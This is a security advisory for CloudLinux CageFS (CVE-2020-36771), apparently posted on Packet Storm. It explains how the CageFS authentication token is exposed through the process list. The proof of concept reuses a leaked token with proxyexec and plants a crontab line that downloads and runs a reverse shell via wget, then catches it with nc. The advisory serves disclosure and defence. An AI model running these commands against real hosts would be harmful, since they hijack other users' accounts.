what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CloudLinux CageFS 7.1.1-1 Token Disclosure

CloudLinux CageFS 7.1.1-1 Token Disclosure
Posted Jan 26, 2024
Authored by David Gnedt | Site sba-research.org

CloudLinux CageFS versions 7.1.1-1 and below pass the authentication token as a command line argument. In some configurations this allows local users to view the authentication token via the process list and gain code execution as another user.

tags | exploit, local, code execution
advisories | CVE-2020-36771
SHA-256 | 437f367ac50c53712ae264b28731e8929e461079e8ff05355b97f16fb6c32a55

CloudLinux CageFS 7.1.1-1 Token Disclosure

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

# CloudLinux CageFS Token Disclosure #

Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure

## Vulnerability Overview ##

CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a
command line argument. In some configurations this allows local users to
view the authentication token via the process list and gain code execution
as another user.

* **Identifier** : SBA-ADV-20200707-01
* **Type of Vulnerability** : Invocation of Process Using Visible Sensitive Information
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)
* **Vendor** : CloudLinux Inc.
* **Affected Versions** : <= 7.1.1-1
* **Fixed in Version** : 7.1.2-2
* **CVE ID** : CVE-2020-36771
* **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
* **CVSS Base Score** : 7.8 (High)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves
> server stability, density, and security by isolating each tenant and
> giving them allocated server resources. This creates an environment
> that feels more like a virtual server than a shared hosting account.
> By doing so, CloudLinux OS reduces operating costs and churn rates,
> and increases profitability.

Source: <https://www.cloudlinux.com/>

## Impact ##

If the `lve_namespaces` service or the virtualized proc filesystem
feature is disabled, a local user can obtain the CageFS authentication
token of other users by exploiting the vulnerability documented in this
advisory. In most configurations this allows attackers to gain code
execution as those users.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.
It allows limited execution of commands outside the CageFS environment from
a user restricted within the CageFS envinronment.

For this purpose a CageFS daemon runs outside of the CageFS environment,
it is accessible via a UNIX socket from within the CageFS environment.
The UNIX socket is handled by `proxyexec`. To make the whole process of
calling a tool outside of the CageFS transparent to the user, wrapper
scripts are placed within CageFS, which in turn call `proxyexec` for
execution of the commands outside of the CageFS environment.

Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token`
and pass it to the `proxyexec` command as a command line argument.

CloudLinux by default enables the virtualized proc filesystem, which
prevents other users from seeing the CageFS token within the process
list. However, if the `lve_namespaces` service is disabled, e.g. the
systemd unit is masked out, or the virtualized proc filesystem is
explicitly disabled, other users can see the CageFS token within the
process list. They can use the CageFS token of other users to talk to
the CageFS daemon via `proxyexec` and the CageFS daemon executes the
commands with the privileges of the supplied authentication token.

## Proof of Concept ##

Let's assume, the `lve_namespaces` service is disabled and we are user
`ftp2406151`:

```sh
$ id
uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151)
```

We list the process list and find another user executing `ping example.org`:

```sh
$ ps aux | grep proxyexec
2094 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server
1180646 934 0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / PING 1180642 example.org
1180647 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server
1181229 ftp24061 0:00 grep proxyexec
```

We now can execute commands as user `ftp1488781` and, for example, view
the crontab:

```sh
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0
no crontab for ftp1488781
```

Now we setup a new crontab entry, which downloads a reverse shell and
executes it every minute:

```sh
$ echo '* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_SAVE 0
```

```sh
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0
* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &
```

Our shell connects back to us and we can execute arbitrary commands as
the other user:

```sh
$ nc -l -p 1234
id
uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781)
```

## Recommended Countermeasures ##

We recommend to avoid passing sensitive information as a command line
argument. Instead, `proxyexec` should directly read the CageFS token
from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS
daemon via the UNIX socket.

## Timeline ##

* `2020-07-07`: identification of vulnerability in version 7.0.6-1
* `2020-07-10`: initial vendor contact
* `2020-07-13`: initial vendor response
* `2020-07-13`: disclosed vulnerability to vendor security contact
* `2020-09-02`: vendor released version 7.1.2-2 to testing
* `2020-09-28`: vendor released version 7.1.2-2 to production
* `2020-10-02`: request CVE from MITRE
* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat
* `2024-01-19`: request CVE from Red Hat
* `2024-01-22`: Red Hat assigned CVE-2020-36771
* `2024-01-25`: public disclosure

## References ##

* CloudLinux OS Documentation. Virtualized /proc filesystem: <https://docs.cloudlinux.com/shared/cloudlinux_os_kernel/#virtualized-proc-filesystem>
* CageFS 7.1.2-2 beta: <https://blog.cloudlinux.com/beta-cagefs-lve-wrappers-and-bsock-updated>
* CageFS 7.1.2-2 production: <https://blog.cloudlinux.com/cagefs-lve-wrappers-and-bsock-have-been-rolled-out-to-100>

## Credits ##

* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWynusACgkQ+7iGL1j3
dbKzLhAAwKYUzx9v+tPeTNNUUrgxibQSZIhtxcvpdfYTFQAm+Rj71F8g+FZIqV0D
5uMjUtutldd1Mh9YfEQ5hGbOawYqnfL9tebEX1SqdbraSD3r4tQEAMowgBMREpFJ
DgUyIVTSnFVTQqcai2wpObPRgs397qM8mrykH5rAKdLD1kBfpULq7Duec62E740u
Ay4YiIiO0OZWf7WElH3KunICE/Sv4TzqZ3DEIlSsQZQv8zM5r44O93FhMiMO6n3R
pKfK8F4ub2y4e3gkW1uaoGO7ZwAW3aR+F5FAi6R5MJXm0RxIibL9tqCyVVrlXTS6
BZiFzsE9ATSSMGVGGH6O6rb1KXXXTc5jopEjGbQgWMKmZn+NK4yHzITFydzJi04P
oaoQmbBWyN4OdfGApvUomyqPp6uUE+i1RfniHq+7vmIR5I7D/KsLQorYonmwD/26
b5BQ99M7sNGHlWbt1vn9imtDj+nw9JTK2425t6swJOc4QPxdKQtx6hESvRJHiPer
M3VFmgj9c19mXQb2B+k+GgM4h7lrhvOyWGreWo1sOBtwcLX7i3zqkCOqowI3DedE
cWV2qjNqTUqM4EMn6Gx5Rf32Kp6e1Jj0GXmMl7TVY5taBSyQ7UXPJkLT6MfyM1v6
hf5wIsINv1dNRQxpWgXiDvZ+d0AdSNxYfRZFe1wyQIKQbwLYm6w=
=d1f0
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close